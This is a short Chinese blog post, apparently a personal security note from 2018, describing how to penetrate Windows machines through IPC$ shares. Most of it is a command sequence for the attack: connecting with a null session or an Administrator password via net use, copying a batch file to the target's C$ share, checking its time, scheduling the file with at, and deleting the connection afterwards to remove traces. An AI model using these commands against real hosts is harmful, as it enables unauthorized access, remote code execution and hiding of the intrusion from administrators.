利用IPC进行渗透

IPC

什么是IPC?
IPC(Internet Process Connect),直译过来就是网络进程连接,一般用来进行资源共享的。
我们经常会说IPC空连接,就是连接的时候不用账户和密码,但是一般这种情况是没啥权限的,如果我们能有一个管理员的账户,那么就可以有管理员的权限来进行渗透了。

IPC入侵思路

因为渗透的时候是需要灵活的技巧,因此这里只是记录一个渗透思路罢了。

IPC空连接

1
net use \\ip\ipc$ "" /user:""

以某用户账户登陆

1
net use \\ip\ipc$ "password" /user:Administrator

之后,我们可以写一个批处理文件,里面包含这我们想执行的命令,然后copy到服务器上

1
copy 1.bat \\ip\c$


这样,就会把它上传到c盘

之后我们可以利用windows的定时任务来执行这个文件
首先我们看一下服务器上的时间

1
net time \\ip

之后利用at命令来设置定时任务

1
at \\ip 时间 文件名

渗透完毕后记得删掉记录

1
net use \\ip\ipc$ /del

本文标题:利用IPC进行渗透

文章作者:Pino-HD

发布时间:2018年08月23日 - 21:08

最后更新:2018年08月23日 - 21:08

原始链接:https://pino-hd.github.io/2018/08/23/利用IPC进行渗透/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

坚持原创技术分享,您的支持将鼓励我继续创作!